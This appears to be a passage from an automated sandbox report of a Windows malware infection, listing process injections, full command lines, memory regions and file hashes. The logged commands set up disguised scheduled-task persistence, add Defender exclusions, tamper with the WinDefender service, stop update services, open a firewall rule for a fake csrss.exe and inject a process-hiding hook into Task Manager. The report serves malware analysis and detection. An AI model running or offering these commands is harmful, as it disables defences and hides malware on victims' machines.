PID 4080 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 620

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2772 -ip 2772

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 880

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 888

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2772 -ip 2772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1456

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Network


Files


memory/2200-298-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2940-309-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-313-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-319-0x0000000004D70000-0x0000000004D85000-memory.dmp

memory/2940-325-0x0000000004D70000-0x0000000004D85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/3048-358-0x0000000000400000-0x0000000000426000-memory.dmp

memory/4768-363-0x0000000005B50000-0x0000000005B60000-memory.dmp

memory/3748-361-0x00000000032E0000-0x00000000032E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\updEdge.exe.log

MD5 8334a471a4b492ece225b471b8ad2fc8
SHA1 1cb24640f32d23e8f7800bd0511b7b9c3011d992
SHA256 5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169
SHA512 56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

memory/2072-368-0x0000000005870000-0x0000000005E88000-memory.dmp

memory/2072-371-0x00000000052D0000-0x00000000052E2000-memory.dmp

memory/2072-374-0x0000000005400000-0x000000000550A000-memory.dmp

memory/3172-386-0x0000000008360000-0x0000000008370000-memory.dmp

memory/2072-393-0x0000000005370000-0x0000000005380000-memory.dmp

memory/3048-390-0x0000000005540000-0x0000000005550000-memory.dmp

memory/3048-387-0x0000000005210000-0x000000000524C000-memory.dmp

memory/3172-411-0x0000000008620000-0x0000000008630000-memory.dmp

memory/3172-409-0x0000000008620000-0x0000000008630000-memory.dmp

memory/4768-412-0x00000000032E0000-0x00000000032E1000-memory.dmp

memory/2768-416-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/3048-417-0x00000000055C0000-0x0000000005626000-memory.dmp

memory/2200-419-0x0000000002D60000-0x000000000364B000-memory.dmp

memory/2072-420-0x0000000006230000-0x00000000062C2000-memory.dmp

memory/2072-421-0x0000000006880000-0x0000000006E24000-memory.dmp

memory/2072-422-0x0000000006350000-0x00000000063C6000-memory.dmp

memory/2072-423-0x00000000065A0000-0x0000000006762000-memory.dmp

memory/2072-425-0x0000000007360000-0x000000000788C000-memory.dmp

memory/2072-426-0x0000000006490000-0x00000000064AE000-memory.dmp

memory/1388-429-0x0000000004E60000-0x0000000004E96000-memory.dmp

memory/1388-431-0x0000000005530000-0x0000000005B58000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

MD5 67345b374ece01694478cd821081caf8
SHA1 04b3bacfe792cfaffb935ecd2b80813b3306b67b
SHA256 5a4a3f6ae9d338ce1639c47779eca19a0e827445e529d6fcf7753e670bf8b4f1
SHA512 fe0c99e9731d3601e701e2bb7c8e542654447822a61c251e0124a1b9643f6264600f45ca8010c6150c9cef6903321f3769fa77008334f7a3c92e0026f83d6853

memory/1388-432-0x0000000005CA0000-0x0000000005CC2000-memory.dmp

memory/2072-434-0x0000000005370000-0x0000000005380000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ie0elnb3.3rm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3172-440-0x0000000008620000-0x0000000008630000-memory.dmp

memory/1388-441-0x0000000004EF0000-0x0000000004F00000-memory.dmp

memory/1388-446-0x0000000005E80000-0x0000000005EE6000-memory.dmp

memory/1388-447-0x0000000006440000-0x000000000645E000-memory.dmp

memory/3172-448-0x0000000008620000-0x0000000008630000-memory.dmp

memory/3172-449-0x0000000008620000-0x0000000008630000-memory.dmp

memory/1388-450-0x0000000006990000-0x00000000069D4000-memory.dmp

memory/1388-451-0x0000000004EF0000-0x0000000004F00000-memory.dmp

memory/1388-452-0x0000000007E60000-0x00000000084DA000-memory.dmp

memory/4508-454-0x00000153F2A50000-0x00000153F2A72000-memory.dmp

memory/1388-453-0x0000000007800000-0x000000000781A000-memory.dmp

memory/4508-456-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/4508-455-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/4508-467-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/4508-466-0x00000153F2C40000-0x00000153F2C50000-memory.dmp

memory/1388-470-0x00000000079B0000-0x00000000079E2000-memory.dmp

memory/1388-471-0x0000000073850000-0x000000007389C000-memory.dmp

memory/1388-472-0x000000006E880000-0x000000006EBD4000-memory.dmp

memory/1388-482-0x0000000007990000-0x00000000079AE000-memory.dmp

memory/1388-484-0x0000000007AE0000-0x0000000007AEA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1388-486-0x000000007FBB0000-0x000000007FBC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

memory/1388-497-0x0000000007BA0000-0x0000000007C36000-memory.dmp

memory/1124-498-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1124-499-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1124-500-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1388-501-0x0000000007B40000-0x0000000007B4E000-memory.dmp

memory/1124-503-0x000001EF9A050000-0x000001EF9A060000-memory.dmp

memory/1388-510-0x0000000007C40000-0x0000000007C5A000-memory.dmp

memory/1388-514-0x0000000007B90000-0x0000000007B98000-memory.dmp

memory/4220-520-0x0000020A1CCC0000-0x0000020A1CCD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9bc110200117a3752313ca2acaf8a9e1
SHA1 fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256 c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA512 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Program Files\Google\Chrome\updater.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9bc110200117a3752313ca2acaf8a9e1
SHA1 fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256 c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
